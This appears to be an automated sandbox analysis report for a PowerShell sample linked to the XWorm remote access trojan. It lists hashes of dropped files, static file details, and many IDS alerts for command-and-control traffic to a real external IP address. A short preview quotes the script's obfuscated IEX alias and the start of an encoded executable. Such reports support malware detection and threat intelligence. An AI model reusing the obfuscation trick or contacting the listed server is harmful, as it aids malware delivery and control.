                              Entropy (8bit):3.73014591243326
                              Encrypted:false
                              SSDEEP:48:Q5tBQaOoCnWU23seukvhkvklCyw7tkewbbBl1BSogZoRjEewbbBl/BSogZoRv1:Wj7CnP8mkvhkvCCt72NbBwHkINbB2Hkd
                              MD5:C7DC63B1E0E3369EDDA2F6E1F61E5CEB
                              SHA1:351E42A16AF3EFBBEB4267BF352CABE11A2045F0
                              SHA-256:A514259E49348FA4C05F4EC6C84460300C95E3CF563DBCB9ACF9646182F0F015
                              SHA-512:A9254C14F0DB740DF5735353410F9C7D9035E193F5448962EFC0DD6CCEDE6031054E108E068DEE41DB455D12674C6796DA54BD1D3E65045F542688A61A59D9D2
                              Malicious:false
                              Preview:...................................FL..................F.".. ......Yd.....K..Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd.......Q....Z..Q......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y.9..........................d...A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......EW)B.Y.9..............................R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.Y.9............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.Y.9............................*.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.Y.9....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.Y.9....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.Y.9.....0..........

                              C:\Windows\appcompat\Programs\Amcache.hve

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.37642127852145
                              Encrypted:false
                              SSDEEP:6144:UFVfpi6ceLP/9skLmb0ByWWSPtaJG8nAge35OlMMhA2AX4WABlguNhiL:0V1TyWWI/glMM6kF7zq
                              MD5:3B9748979D50797BE4A2A203F9DEF2C0
                              SHA1:A8688627C7ADD43B4E0793C42661A10354935549
                              SHA-256:C97129BD9857FF48CE3A30211F33041F6E940E9E2514E39FB54BB8E3585ADAB7
                              SHA-512:C5A533EE4A775BA35E14E62D9DC8AAFCF850DF6596E31F9E9413AF0B16DC1A07D6FA1F0118AFB8F3C5E9208E62FDC64F0C718FDF6BEB3CD7FB32D3EB372D80A2
                              Malicious:false
                              Preview:regfD...D....\.Z.................... ....@......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....Q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:ASCII text, with very long lines (65463), with CRLF line terminators
                              Entropy (8bit):5.1590106021952575
                              TrID:
                                File name:QP2uO3eN2p.ps1
                                File size:341'153 bytes
                                MD5:6d71ada719b48d770647e3e703cbbcfd
                                SHA1:bc2dd183895888c20057f165d3332e8ecf6a6ada
                                SHA256:7dc08327ae721c3ecf12447901858457bf510dd7016838839a629f86d673b18b
                                SHA512:66d6563dc7e30d3f0a753e1e3b7368914ae03a671824d02ac345ccd648451c80e52b0bfb5d7d42fdd023d59aac1ec718507568ef39cead9a5ec78e1d844d74c2
                                SSDEEP:6144:3K4rMAa8DAz7OGxuerPkwn4Je1Z0e9JCrSKQ81J7lHH7urZyrnpGYPoHdolDeZl7:yfyNcJrk6TKy
                                TLSH:81743C318805B92F8EEF1F87B5402FD37C78217BDF551018A88F16B96A68238597AF74
                                File Content Preview:ipconfig /flushdns.... $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAE

                                File Icon

                                Icon Hash:3270d6baae77db44

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-12-18T08:15:42.786507+01002858800ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:15:43.333388+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:15:43.392540+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:15:57.158905+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:15:57.163921+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:15:58.442835+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:15:58.442835+01002858801ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:11.015125+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:11.017028+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:24.874899+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:24.877591+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:28.597087+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:30.404357+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:30.407637+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:31.044515+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:31.046398+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:31.686005+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:31.717077+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:32.036316+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:32.038280+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:32.322472+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:32.324560+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:33.044858+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:33.046685+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:33.647092+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:33.649040+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:33.838111+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:34.256991+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:34.258520+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:34.448063+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:34.498083+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:34.865787+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:34.871488+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:35.056779+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:35.059297+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:35.657782+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:35.848677+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:35.968423+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:35.968475+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:36.081371+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:36.159529+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:36.204297+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:36.456221+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:36.486225+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:36.578467+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:36.647151+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:36.767180+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:36.888806+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:37.057913+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:37.064619+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:37.177709+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:37.202971+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:37.428366+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:37.726486+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:37.728261+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:37.960367+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:37.972727+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:38.039017+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:38.092863+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:38.404743+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:38.457944+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:38.648316+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:38.650360+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:38.839427+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:38.841832+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:38.961338+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:38.965834+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:39.278761+01002858799ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:39.607222+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:39.637499+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:39.846527+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:39.856187+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:40.756259+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:40.757913+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:40.947965+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:40.949831+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:41.671236+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:41.673227+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:41.938130+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:41.939616+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:42.275763+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:42.342737+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:42.413501+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:42.462930+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:42.604480+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:42.629844+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:42.773737+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:42.817854+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:43.873445+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:44.064574+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:44.157275+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:44.571175+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:44.733309+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:46.591890+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:46.593476+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:47.498676+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:47.500355+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:48.112016+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:48.169267+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:48.303350+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:48.305446+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:48.360230+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:48.474790+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:48.493884+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:48.595877+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:49.669827+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:49.716014+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:49.860846+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:50.026813+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:50.051921+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:50.051995+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:50.325197+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:50.327274+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:50.521845+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:50.638151+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:50.761244+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:51.119723+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:51.121851+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:51.761498+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:51.944455+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:52.063076+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:52.445896+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:52.448689+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:52.504580+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:52.609713+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:52.624346+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:52.729516+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:52.759401+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:53.137497+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:53.137643+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:53.169297+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:53.835046+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:53.851286+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:54.049025+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:54.074535+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:54.265643+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:54.288794+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:54.360679+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:54.409288+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:54.480016+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:54.529084+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:54.670898+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:54.787278+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:54.787487+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:54.949423+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:56.216871+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:56.231810+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:56.408744+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:56.411401+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:56.645108+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:56.646506+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:58.870137+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:59.061121+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:59.065875+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
